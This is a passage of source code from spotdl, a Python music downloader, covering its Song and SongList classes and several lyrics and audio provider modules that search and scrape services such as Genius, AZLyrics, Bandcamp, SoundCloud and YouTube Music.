= spotify_client.album(album_id) # type: ignore # create song object return cls( name=raw_track_meta["name"], artists=[artist["name"] for artist in raw_track_meta["artists"]], artist=raw_track_meta["artists"][0]["name"], artist_id=primary_artist_id, album_id=album_id, album_name=raw_album_meta["name"], album_artist=raw_album_meta["artists"][0]["name"], album_type=raw_album_meta["album_type"], copyright_text=( raw_album_meta["copyrights"][0]["text"] if raw_album_meta["copyrights"] else None ), genres=raw_album_meta["genres"] + raw_artist_meta["genres"], disc_number=raw_track_meta["disc_number"], disc_count=int(raw_album_meta["tracks"]["items"][-1]["disc_number"]), duration=int(raw_track_meta["duration_ms"] / 1000), year=int(raw_album_meta["release_date"][:4]), date=raw_album_meta["release_date"], track_number=raw_track_meta["track_number"], tracks_count=raw_album_meta["total_tracks"], isrc=raw_track_meta.get("external_ids", {}).get("isrc"), song_id=raw_track_meta["id"], explicit=raw_track_meta["explicit"], publisher=raw_album_meta["label"], url=raw_track_meta["external_urls"]["spotify"], popularity=raw_track_meta["popularity"], cover_url=( max(raw_album_meta["images"], key=lambda i: i["width"] * i["height"])[ "url" ] if raw_album_meta["images"] else None ), ) @staticmethod def search(search_term: str): """ Searches for Songs from a search term. ### Arguments - search_term: The search term to use. ### Returns - The raw search results """ spotify_client = SpotifyClient() raw_search_results = spotify_client.search(search_term) if raw_search_results is None: raise SongError(f"Spotipy error, no response: {search_term}") return raw_search_results @classmethod def from_search_term(cls, search_term: str) -> "Song": """ Creates a list of Song objects from a search term. ### Arguments - search_term: The search term to use. ### Returns - The Song object. 
""" raw_search_results = Song.search(search_term) if len(raw_search_results["tracks"]["items"]) == 0: raise SongError(f"No results found for: {search_term}") return Song.from_url( "http://open.spotify.com/track/" + raw_search_results["tracks"]["items"][0]["id"] ) @classmethod def list_from_search_term(cls, search_term: str) -> "List[Song]": """ Creates a list of Song objects from a search term. ### Arguments - search_term: The search term to use. ### Returns - The list of Song objects. """ raw_search_results = Song.search(search_term) songs = [] for idx, _ in enumerate(raw_search_results.get("tracks", []).get("items", [])): songs.append( Song.from_url( "http://open.spotify.com/track/" + raw_search_results["tracks"]["items"][idx]["id"] ) ) return songs @classmethod def from_data_dump(cls, data: str) -> "Song": """ Create a Song object from a data dump. ### Arguments - data: The data dump. ### Returns - The Song object. """ # Create dict from json string data_dict = json.loads(data) # Return product object return cls(**data_dict) @classmethod def from_dict(cls, data: Dict[str, Any]) -> "Song": """ Create a Song object from a dictionary. ### Arguments - data: The dictionary. ### Returns - The Song object. """ # Return product object return cls(**data) @classmethod def from_missing_data(cls, **kwargs) -> "Song": """ Create a Song object from a dictionary with missing data. For example, data dict doesn't contain all the required attributes for the Song class. ### Arguments - data: The dictionary. ### Returns - The Song object. """ song_data: Dict[str, Any] = {} for key in cls.__dataclass_fields__: # pylint: disable=E1101 song_data.setdefault(key, kwargs.get(key)) return cls(**song_data) @property def display_name(self) -> str: """ Returns a display name for the song. ### Returns - The display name. """ return f"{self.artist} - {self.name}" @property def json(self) -> Dict[str, Any]: """ Returns a dictionary of the song's data. ### Returns - The dictionary. """ return asdict(self) @dataclass(frozen=True) class SongList: """ SongList class. Base class for all other song lists subclasses. """ name: str url: str urls: List[str] songs: List[Song] @classmethod def from_url(cls, url: str, fetch_songs: bool = True): """ Create a SongList object from a url. ### Arguments - url: The url of the list. - fetch_songs: Whether to fetch missing metadata for songs. ### Returns - The SongList object. """ metadata, songs = cls.get_metadata(url) urls = [song.url for song in songs] if fetch_songs: songs = [Song.from_url(song.url) for song in songs] return cls(**metadata, urls=urls, songs=songs) @classmethod def from_search_term(cls, search_term: str, fetch_songs: bool = True): """ Creates a SongList object from a search term. ### Arguments - search_term: The search term to use. ### Returns - The SongList object. 
""" list_type = cls.__name__.lower() spotify_client = SpotifyClient() raw_search_results = spotify_client.search(search_term, type=list_type) if ( raw_search_results is None or len(raw_search_results.get(f"{list_type}s", {}).get("items", [])) == 0 ): raise SongListError( f"No {list_type} matches found on spotify for '{search_term}'" ) matches = {} for result in raw_search_results[f"{list_type}s"]["items"]: score = fuzz.ratio(search_term.split(":", 1)[1].strip(), result["name"]) matches[result["id"]] = score best_match = max(matches, key=matches.get) # type: ignore return cls.from_url( f"http://open.spotify.com/{list_type}/{best_match}", fetch_songs, ) @property def length(self) -> int: """ Get list length (number of songs). ### Returns - The list length. """ return max(len(self.urls), len(self.songs)) @property def json(self) -> Dict[str, Any]: """ Returns a dictionary of the song list's data. ### Returns - The dictionary. """ return asdict(self) @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for a song list. ### Arguments - url: The url of the song list. ### Returns - The metadata. """ raise NotImplementedError File: spotdl/providers/__init__.py """ Different types of data providers for spotdl. """ File: spotdl/providers/lyrics/genius.py """ Genius Lyrics module. """ from typing import Dict, List, Optional import requests from bs4 import BeautifulSoup from spotdl.providers.lyrics.base import LyricsProvider from spotdl.utils.config import GlobalConfig __all__ = ["Genius"] class Genius(LyricsProvider): """ Genius lyrics provider class. """ def __init__(self, access_token: str): """ Init the lyrics provider search and set headers. """ super().__init__() self.access_token = access_token self.headers.update( { "Authorization": f"Bearer {self.access_token}", } ) self.session = requests.Session() self.session.headers.update(self.headers) def get_results(self, name: str, artists: List[str], **_) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ artists_str = ", ".join(artists) title = f"{name} - {artists_str}" search_response = self.session.get( "https://api.genius.com/search", params={"q": title}, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) results: Dict[str, str] = {} for hit in search_response.json()["response"]["hits"]: results[hit["result"]["full_title"]] = hit["result"]["id"] return results def extract_lyrics(self, url: str, **_) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. 
""" url = f"https://api.genius.com/songs/{url}" song_response = self.session.get( url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) url = song_response.json()["response"]["song"]["url"] soup = None counter = 0 while counter < 4: genius_page_response = self.session.get( url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) if not genius_page_response.ok: counter += 1 continue soup = BeautifulSoup( genius_page_response.text.replace("<br/>", "\n"), "html.parser" ) break if soup is None: return None lyrics_div = soup.select_one("div.lyrics") lyrics_containers = soup.select("div[class^=Lyrics__Container]") # Get lyrics if lyrics_div: lyrics = lyrics_div.get_text() elif lyrics_containers: lyrics = "\n".join(con.get_text() for con in lyrics_containers) else: return None if not lyrics: return None # Clean lyrics lyrics = lyrics.strip() # Remove desc at the beginning if it exists for to_remove in ["desc", "Desc"]: lyrics.replace(to_remove, "", 1) return lyrics File: spotdl/providers/lyrics/musixmatch.py """ MusixMatch lyrics provider. """ from typing import Dict, List, Optional from urllib.parse import quote import requests from bs4 import BeautifulSoup from spotdl.providers.lyrics.base import LyricsProvider from spotdl.utils.config import GlobalConfig __all__ = ["MusixMatch"] class MusixMatch(LyricsProvider): """ MusixMatch lyrics provider class. """ def extract_lyrics(self, url: str, **_) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ lyrics_resp = requests.get( url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) lyrics_soup = BeautifulSoup(lyrics_resp.text, "html.parser") lyrics_paragraphs = lyrics_soup.select("p.mxm-lyrics__content") lyrics = "\n".join(i.get_text() for i in lyrics_paragraphs) return lyrics def get_results(self, name: str, artists: List[str], **kwargs) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ track_search = kwargs.get("track_search", False) artists_str = ", ".join( artist for artist in artists if artist.lower() not in name.lower() ) # quote the query so that it's safe to use in a url # e.g "Au/Ra" -> "Au%2FRa" query = quote(f"{name} - {artists_str}", safe="") # search the `tracks page` if track_search is True if track_search: query += "/tracks" search_url = f"https://www.musixmatch.com/search/{query}" search_resp = requests.get( search_url, headers=self.headers, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) search_soup = BeautifulSoup(search_resp.text, "html.parser") song_url_tag = search_soup.select("a[href^='/lyrics/']") if not song_url_tag: # song_url_tag being None means no results were found on the # All Results page, therefore, we use `track_search` to # search the tracks page. # track_serach being True means we are already searching the tracks page. 
if track_search: return {} return self.get_results(name, artists, track_search=True) results: Dict[str, str] = {} for tag in song_url_tag: results[tag.get_text()] = "https://www.musixmatch.com" + str( tag.get("href", "") ) return results File: spotdl/providers/lyrics/synced.py """ Synced lyrics provider using the syncedlyrics library """ from typing import Dict, List, Optional import requests import syncedlyrics from spotdl.providers.lyrics.base import LyricsProvider __all__ = ["Synced"] class Synced(LyricsProvider): """ Lyrics provider for synced lyrics using the syncedlyrics library Currently supported websites: Deezer, NetEase """ def get_results(self, name: str, artists: List[str], **kwargs) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ raise NotImplementedError def extract_lyrics(self, url: str, **kwargs) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ raise NotImplementedError def get_lyrics(self, name: str, artists: List[str], **kwargs) -> Optional[str]: """ Try to get lyrics using syncedlyrics ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ try: lyrics = syncedlyrics.search( f"{name} - {artists[0]}", synced_only=not kwargs.get("allow_plain_format", True), ) return lyrics except requests.exceptions.SSLError: # Max retries reached return None except TypeError: # Error at syncedlyrics.providers.musixmatch L89 - # Because `body` is occasionally an empty list instead of a dictionary. # We get this error when allow_plain_format is set to True, # and there are no synced lyrics present # Because its empty, we know there are no lyrics return None File: spotdl/providers/lyrics/__init__.py """ Lyrics providers for spotdl. """ from spotdl.providers.lyrics.azlyrics import AzLyrics from spotdl.providers.lyrics.base import LyricsProvider from spotdl.providers.lyrics.genius import Genius from spotdl.providers.lyrics.musixmatch import MusixMatch from spotdl.providers.lyrics.synced import Synced __all__ = ["AzLyrics", "Genius", "MusixMatch", "Synced", "LyricsProvider"] File: spotdl/providers/lyrics/base.py """ Base module for all other lyrics providers. """ import logging from typing import Dict, List, Optional from spotdl.utils.formatter import ratio, slugify from spotdl.utils.matching import based_sort __all__ = ["LyricsProvider"] logger = logging.getLogger(__name__) class LyricsProvider: """ Base class for all other lyrics providers. """ def __init__(self): """ Init the lyrics provider searchand set headers. 
""" self.headers = { "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache", "sec-ch-ua": '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"', "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36", "Accept": "*/*", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Language": "en-US;q=0.8,en;q=0.7", } def get_results(self, name: str, artists: List[str], **kwargs) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) """ raise NotImplementedError def extract_lyrics(self, url: str, **kwargs) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ raise NotImplementedError def get_lyrics(self, name: str, artists: List[str], **kwargs) -> Optional[str]: """ Returns the lyrics for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ try: results = self.get_results(name, artists, **kwargs) except Exception as exc: logger.debug( "%s: Failed to get results for %s - %s: %s", self.name, name, ", ".join(artists), exc, ) return None if not results: return None results_with_score = {} for title, url in results.items(): result_title = slugify(title) match_title = slugify(f"{name} - {', '.join(artists)}") res_list, song_list = based_sort( result_title.split("-"), match_title.split("-") ) result_title, match_title = "-".join(res_list), "-".join(song_list) score = ratio(result_title, match_title) results_with_score[score] = url if not results_with_score: return None # Get song url with highest title match score, url = max(results_with_score.items(), key=lambda x: x[0]) # Only return lyrics if the title match is at least 55% if score < 55: return None try: return self.extract_lyrics(url, **kwargs) except Exception as exc: logger.debug( "%s: Failed to extract lyrics from %s: %s", self.name, url, exc ) return None @property def name(self) -> str: """ Returns the name of the lyrics provider. """ return self.__class__.__name__ File: spotdl/providers/lyrics/azlyrics.py """ AZLyrics lyrics module. """ from typing import Dict, List, Optional import requests from bs4 import BeautifulSoup from spotdl.providers.lyrics.base import LyricsProvider __all__ = ["AzLyrics"] class AzLyrics(LyricsProvider): """ AZLyrics lyrics provider class. """ def __init__(self): super().__init__() self.session = requests.Session() self.session.headers.update(self.headers) self.x_code = self.get_x_code() def get_results(self, name: str, artists: List[str], **_) -> Dict[str, str]: """ Returns the results for the given song. ### Arguments - name: The name of the song. - artists: The artists of the song. - kwargs: Additional arguments. ### Returns - A dictionary with the results. (The key is the title and the value is the url.) 
""" if self.x_code is None: self.x_code = self.get_x_code() if self.x_code is None: return {} # Join every artist by comma in artists artist_str = ", ".join(artist for artist in artists if artist) params = { "q": f"{artist_str} - {name}", "x": self.x_code, } counter = 0 soup = None while counter < 4: try: response = self.session.get( "https://search.azlyrics.com/search.php", params=params ) except requests.ConnectionError: continue if not response.ok: counter += 1 continue soup = BeautifulSoup(response.content, "html.parser") break if soup is None: return {} td_tags = soup.find_all("td") if len(td_tags) == 0: return {} results = {} for td_tag in td_tags: a_tags = td_tag.find_all("a", href=True) if len(a_tags) == 0: continue a_tag = a_tags[0] url = a_tag["href"].strip() if url == "": continue title = td_tag.find("span").get_text().strip() artist = td_tag.find("b").get_text().strip() results[f"{artist} - {title}"] = url return results def extract_lyrics(self, url: str, **_) -> Optional[str]: """ Extracts the lyrics from the given url. ### Arguments - url: The url to extract the lyrics from. - kwargs: Additional arguments. ### Returns - The lyrics of the song or None if no lyrics were found. """ response = self.session.get(url) soup = BeautifulSoup(response.content, "html.parser") # Find all divs that don't have a class div_tags = soup.find_all("div", class_=False, id_=False) # Find the div with the longest text lyrics_div = sorted(div_tags, key=lambda x: len(x.text))[-1] # extract lyrics from div and clean it up lyrics = lyrics_div.get_text().strip() return lyrics def get_x_code(self) -> Optional[str]: """ Returns the x_code used by AZLyrics. ### Returns - The x_code used by AZLyrics or None if it couldn't be retrieved. """ x_code = None try: self.session.get("https://www.azlyrics.com/") resp = self.session.get("https://www.azlyrics.com/geo.js") # extract value from js code js_code = resp.text start_index = js_code.find('value"') + 9 end_index = js_code[start_index:].find('");') x_code = js_code[start_index : start_index + end_index] except requests.ConnectionError: pass return x_code File: spotdl/providers/audio/bandcamp.py """ BandCamp module for downloading and searching songs. 
""" import logging from typing import Any, Dict, List, Optional, Tuple import requests from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result from spotdl.utils.config import GlobalConfig __all__ = ["BandCamp"] logger = logging.getLogger(__name__) class BandCampTrack: """ BandCamp track class based on the bandcamp_api library """ def __init__(self, artist_id: int, track_id: int): # object info self.type = "track" # track information self.track_id: int = 0 self.track_title: str = "" self.track_number: int = 0 self.track_duration_seconds: float = 0.00 self.track_streamable: Optional[bool] = None self.has_lyrics: Optional[bool] = None self.lyrics: str = "" self.is_price_set: Optional[bool] = None self.price: dict = {} self.require_email: Optional[bool] = None self.is_purchasable: Optional[bool] = None self.is_free: Optional[bool] = None self.is_preorder: Optional[bool] = None self.tags: list = [] self.track_url: str = "" # art self.art_id: int = 0 self.art_url: str = "" # artist information self.artist_id: int = 0 self.artist_title: str = "" # album information self.album_id: int = 0 self.album_title: str = "" # label self.label_id: int = 0 self.label_title: str = "" # about self.about: str = "" self.credits: str = "" self.date_released_unix: int = 0 # advanced self.date_last_modified_unix: int = 0 self.date_published_unix: int = 0 self.supporters: list = [] response = requests.get( url="https://bandcamp.com/api/mobile/25/tralbum_details?band_id=" + str(artist_id) + "&tralbum_id=" + str(track_id) + "&tralbum_type=t", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) result = response.json() self.track_id = result["id"] self.track_title = result["title"] self.track_number = result["tracks"][0]["track_num"] self.track_duration_seconds = result["tracks"][0]["duration"] self.track_streamable = result["tracks"][0]["is_streamable"] self.has_lyrics = result["tracks"][0]["has_lyrics"] # getting lyrics, if there is any if self.has_lyrics is True: resp = requests.get( "https://bandcamp.com/api/mobile/25/tralbum_lyrics?tralbum_id=" + str(self.track_id) + "&tralbum_type=t", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) rjson = resp.json() self.lyrics = rjson["lyrics"][str(self.track_id)] self.is_price_set = result["is_set_price"] self.price = {"currency": result["currency"], "amount": result["price"]} self.require_email = result["require_email"] self.is_purchasable = result["is_purchasable"] self.is_free = result["free_download"] self.is_preorder = result["is_preorder"] for tag in result["tags"]: self.tags.append(tag["name"]) self.art_id = result["art_id"] self.art_url = "https://f4.bcbits.com/img/a" + str(self.art_id) + "_0.jpg" self.artist_id = result["band"]["band_id"] self.artist_title = result["band"]["name"] self.album_id = result["album_id"] self.album_title = result["album_title"] self.label_id = result["label_id"] self.label_title = result["label"] self.about = result["about"] self.credits = result["credits"] self.date_released_unix = result["release_date"] self.track_url = result["bandcamp_url"] def search(search_string: str = ""): """ I got this api url from the iOS app needs a way of removing characters that will screw up an url keep url safe characters ### Arguments - search_string: The search term to search for. 
### Returns - A list of artist and track ids if found """ response = requests.get( "https://bandcamp.com/api/fuzzysearch/2/app_autocomplete?q=" + search_string + "&param_with_locations=true", timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ) results = response.json()["results"] return_results: List[Tuple[str, str]] = [] for item in results: if item["type"] == "t": return_results.append((item["band_id"], item["id"])) return return_results class BandCamp(AudioProvider): """ SoundCloud audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def get_results(self, search_term: str, *_args, **_kwargs) -> List[Result]: """ Get results from slider.kz ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of slider.kz results if found, None otherwise. """ try: results = search(search_term) except KeyError: return [] except Exception as exc: logger.error("Failed to get results from BandCamp", exc_info=exc) return [] simplified_results: List[Result] = [] for result in results: track = BandCampTrack(int(result[0]), int(result[1])) simplified_results.append( Result( source="bandcamp", url=track.track_url, verified=False, name=track.track_title, duration=track.track_duration_seconds, author=track.artist_title, result_id=track.track_url, search_query=search_term, album=track.album_title, artists=tuple(track.artist_title.split(", ")), ) ) return simplified_results File: spotdl/providers/audio/youtube.py """ Youtube module for downloading and searching songs. """ from typing import Any, Dict, List, Optional from pytube import Search from pytube import YouTube as PyTube from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result __all__ = ["YouTube"] class YouTube(AudioProvider): """ YouTube audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def get_results( self, search_term: str, *_args, **_kwargs ) -> List[Result]: # pylint: disable=W0221 """ Get results from YouTube ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of YouTube results if found, None otherwise. """ search_results: Optional[List[PyTube]] = Search(search_term).results if not search_results: return [] results = [] for result in search_results: if result.watch_url: try: duration = result.length except Exception: duration = 0 try: views = result.views except Exception: views = 0 results.append( Result( source=self.name, url=result.watch_url, verified=False, name=result.title, duration=duration, author=result.author, search_query=search_term, views=views, result_id=result.video_id, ) ) return results File: spotdl/providers/audio/sliderkz.py """ SliderKZ module for downloading and searching songs. """ import logging from typing import Any, Dict, List import requests from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result from spotdl.utils.config import GlobalConfig __all__ = ["SliderKZ"] logger = logging.getLogger(__name__) HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" } class SliderKZ(AudioProvider): """ Slider.kz audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def get_results(self, search_term: str, *_args, **_kwargs) -> List[Result]: """ Get results from slider.kz ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. 
### Returns - A list of slider.kz results if found, None otherwise. """ search_results = None max_retries = 0 while not search_results and max_retries < 3: try: search_response = requests.get( url="https://hayqbhgr.slider.kz/vk_auth.php?q=" + search_term, headers=HEADERS, timeout=5, proxies=GlobalConfig.get_parameter("proxies"), ) # Check if the response is valid if len(search_response.text) > 30: # Set the search results to the json response # effectively breaking out of the loop search_results = search_response.json() except Exception as exc: logger.debug( "Slider.kz search failed for query %s with error: %s. Retrying...", search_term, exc, ) max_retries += 1 if not search_results: logger.debug("Slider.kz search failed for query %s", search_term) return [] results = [] for result in search_results["audios"][""]: # urls from slider.kz sometimes are relative, so we need to add the domain if "https://" not in result["url"]: result["url"] = "https://hayqbhgr.slider.kz/" + result["url"] results.append( Result( source="slider.kz", url=result.get("url"), verified=False, name=result.get("tit_art"), duration=int(result.get("duration", -9999)), author="slider.kz", result_id=result.get("id"), views=1, ) ) return results File: spotdl/providers/audio/__init__.py """ Audio providers for spotdl. """ from spotdl.providers.audio.bandcamp import BandCamp from spotdl.providers.audio.base import ( ISRC_REGEX, AudioProvider, AudioProviderError, YTDLLogger, ) from spotdl.providers.audio.piped import Piped from spotdl.providers.audio.sliderkz import SliderKZ from spotdl.providers.audio.soundcloud import SoundCloud from spotdl.providers.audio.youtube import YouTube from spotdl.providers.audio.ytmusic import YouTubeMusic __all__ = [ "YouTube", "YouTubeMusic", "SliderKZ", "SoundCloud", "BandCamp", "Piped", "AudioProvider", "AudioProviderError", "YTDLLogger", "ISRC_REGEX", ] File: spotdl/providers/audio/soundcloud.py """ SoundCloud module for downloading and searching songs. """ import logging import re from itertools import islice from typing import Any, Dict, List from soundcloud import SoundCloud as SoundCloudClient from soundcloud.resource.track import Track from spotdl.providers.audio.base import AudioProvider from spotdl.types.result import Result __all__ = ["SoundCloud"] logger = logging.getLogger(__name__) class SoundCloud(AudioProvider): """ SoundCloud audio provider class """ SUPPORTS_ISRC = False GET_RESULTS_OPTS: List[Dict[str, Any]] = [{}] def __init__(self, *args: Any, **kwargs: Any) -> None: """ Initialize the SoundCloud API ### Arguments - args: Arguments passed to the `AudioProvider` class. - kwargs: Keyword arguments passed to the `AudioProvider` class. """ super().__init__(*args, **kwargs) self.client = SoundCloudClient() def get_results(self, search_term: str, *_args, **_kwargs) -> List[Result]: """ Get results from slider.kz ### Arguments - search_term: The search term to search for. - args: Unused. - kwargs: Unused. ### Returns - A list of slider.kz results if found, None otherwise. 
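        For illustration, the secondary search below strips a leading
        "Artist -" prefix and any parenthesised suffix from the query before
        searching again (the input string is made up):

        ```python
        import re

        regex = r"^(.+?)-|(\(\w+[\s\S]*\))"
        re.sub(regex, "", "Artist Name - Song Title (Official Video)")
        # -> ' Song Title '
        ```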
""" results = list(islice(self.client.search(search_term), 20)) regex = r"^(.+?)-|(\(\w+[\s\S]*\))" # Because anyone can post on soundcloud, we do another search with an edited search # The regex removes anything in brackets and the artist(s)'s name(s) if in the name edited_search_term = re.sub(regex, "", search_term) results.extend(list(islice(self.client.search(edited_search_term), 20))) # Simplify results simplified_results = [] for result in results: if not isinstance(result, Track): continue # Ignore results that are not playable if "/preview/" in result.media.transcodings[0].url: continue album = self.client.get_track_albums(result.id) try: album_name = next(album).title except StopIteration: album_name = None simplified_results.append( Result( source="soundcloud", url=result.permalink_url, name=result.title, verified=result.user.verified, duration=result.full_duration, author=result.user.username, result_id=str(result.id), isrc_search=False, search_query=search_term, views=result.playback_count, explicit=False, album=album_name, ) ) return simplified_results File: spotdl/providers/audio/ytmusic.py """ YTMusic module for downloading and searching songs. """ from typing import Any, Dict, List from ytmusicapi import YTMusic from spotdl.providers.audio.base import ISRC_REGEX, AudioProvider from spotdl.types.result import Result from spotdl.utils.formatter import parse_duration __all__ = ["YouTubeMusic"] class YouTubeMusic(AudioProvider): """ YouTube Music audio provider class """ SUPPORTS_ISRC = True GET_RESULTS_OPTS: List[Dict[str, Any]] = [ {"filter": "songs", "ignore_spelling": True, "limit": 50}, {"filter": "videos", "ignore_spelling": True, "limit": 50}, ] def __init__(self, *args: Any, **kwargs: Any) -> None: """ Initialize the YouTube Music API ### Arguments - args: Arguments passed to the `AudioProvider` class. - kwargs: Keyword arguments passed to the `AudioProvider` class. """ super().__init__(*args, **kwargs) self.client = YTMusic(language="de") def get_results(self, search_term: str, **kwargs) -> List[Result]: """ Get results from YouTube Music API and simplify them ### Arguments - search_term: The search term to search for. - kwargs: other keyword arguments passed to the `YTMusic.search` method. ### Returns - A list of simplified results (dicts) """ is_isrc_result = ISRC_REGEX.search(search_term) is not None # if is_isrc_result: # print("FORCEFULLY SETTING FILTER TO SONGS") # kwargs["filter"] = "songs" search_results = self.client.search(search_term, **kwargs) # Simplify results results = [] for result in search_results: if ( result is None or result.get("videoId") is None or result.get("artists") in [[], None] ): continue results.append( Result( source=self.name, url=( f'https://{"music" if result["resultType"] == "song" else "www"}' f".youtube.com/watch?v={result['videoId']}" ), verified=result.get("resultType") == "song", name=result["title"], result_id=result["videoId"], author=result["artists"][0]["name"], artists=tuple(map(lambda a: a["name"], result["artists"])), duration=parse_duration(result.get("duration")), isrc_search=is_isrc_result, search_query=search_term, explicit=result.get("isExplicit"), album=( result.get("album", {}).get("name") if result.get("album") else None ), ) ) return results File: spotdl/providers/audio/base.py """ Base audio provider module. 
""" import logging import re import shlex from typing import Any, Dict, List, Optional, Tuple from yt_dlp import YoutubeDL from spotdl.types.result import Result from spotdl.types.song import Song from spotdl.utils.config import get_temp_path from spotdl.utils.formatter import ( args_to_ytdlp_options, create_search_query, create_song_title, ) from spotdl.utils.matching import get_best_matches, order_results __all__ = ["AudioProviderError", "AudioProvider", "ISRC_REGEX", "YTDLLogger"] logger = logging.getLogger(__name__) class AudioProviderError(Exception): """ Base class for all exceptions related to audio searching/downloading. """ class YTDLLogger: """ Custom YT-dlp logger. """ def debug(self, msg): """ YTDL uses this to print debug messages. """ pass # pylint: disable=W0107 def warning(self, msg): """ YTDL uses this to print warnings. """ pass # pylint: disable=W0107 def error(self, msg): """ YTDL uses this to print errors. """ raise AudioProviderError(msg) ISRC_REGEX = re.compile(r"^[A-Z]{2}-?\w{3}-?\d{2}-?\d{5}$") class AudioProvider: """ Base class for all other providers. Provides some common functionality. Handles the yt-dlp audio handler. """ SUPPORTS_ISRC: bool GET_RESULTS_OPTS: List[Dict[str, Any]] def __init__( self, output_format: str = "mp3", cookie_file: Optional[str] = None, search_query: Optional[str] = None, filter_results: bool = True, yt_dlp_args: Optional[str] = None, ) -> None: """ Base class for audio providers. ### Arguments - output_directory: The directory to save the downloaded songs to. - output_format: The format to save the downloaded songs in. - cookie_file: The path to a file containing cookies to be used by YTDL. - search_query: The query to use when searching for songs. - filter_results: Whether to filter results. """ self.output_format = output_format self.cookie_file = cookie_file self.search_query = search_query self.filter_results = filter_results if self.output_format == "m4a": ytdl_format = "bestaudio[ext=m4a]/bestaudio/best" elif self.output_format == "opus": ytdl_format = "bestaudio[ext=webm]/bestaudio/best" else: ytdl_format = "bestaudio" yt_dlp_options = { "format": ytdl_format, "quiet": True, "no_warnings": True, "encoding": "UTF-8", "logger": YTDLLogger(), "cookiefile": self.cookie_file, "outtmpl": str((get_temp_path() / "%(id)s.%(ext)s").resolve()), "retries": 5, } if yt_dlp_args: yt_dlp_options = args_to_ytdlp_options( shlex.split(yt_dlp_args), yt_dlp_options ) self.audio_handler = YoutubeDL(yt_dlp_options) def get_results(self, search_term: str, **kwargs) -> List[Result]: """ Get results from audio provider. ### Arguments - search_term: The search term to use. - kwargs: Additional arguments. ### Returns - A list of results. """ raise NotImplementedError def get_views(self, url: str) -> int: """ Get the number of views for a video. ### Arguments - url: The url of the video. ### Returns - The number of views. """ data = self.get_download_metadata(url) return data["view_count"] def search(self, song: Song, only_verified: bool = False) -> Optional[str]: """ Search for a song and return best match. ### Arguments - song: The song to search for. ### Returns - The url of the best match or None if no match was found. 
""" # Create initial search query search_query = create_song_title(song.name, song.artists).lower() if self.search_query: search_query = create_search_query( song, self.search_query, False, None, True ) logger.debug("[%s] Searching for %s", song.song_id, search_query) isrc_urls: List[str] = [] # search for song using isrc if it's available if song.isrc and self.SUPPORTS_ISRC and not self.search_query: isrc_results = self.get_results(song.isrc) if only_verified: isrc_results = [result for result in isrc_results if result.verified] logger.debug( "[%s] Filtered to %s verified ISRC results", song.song_id, len(isrc_results), ) isrc_urls = [result.url for result in isrc_results] logger.debug( "[%s] Found %s results for ISRC %s", song.song_id, len(isrc_results), song.isrc, ) if len(isrc_results) == 1 and isrc_results[0].verified: # If we only have one verified result, return it # What's the chance of it being wrong? logger.debug( "[%s] Returning only ISRC result %s", song.song_id, isrc_results[0].url, ) return isrc_results[0].url if len(isrc_results) > 0: sorted_isrc_results = order_results( isrc_results, song, self.search_query ) # get the best result, if the score is above 80 return it best_isrc_results = sorted( sorted_isrc_results.items(), key=lambda x: x[1], reverse=True ) logger.debug( "[%s] Filtered to %s ISRC results", song.song_id, len(best_isrc_results), ) if len(best_isrc_results) > 0: best_isrc = best_isrc_results[0] if best_isrc[1] > 80.0: logger.debug( 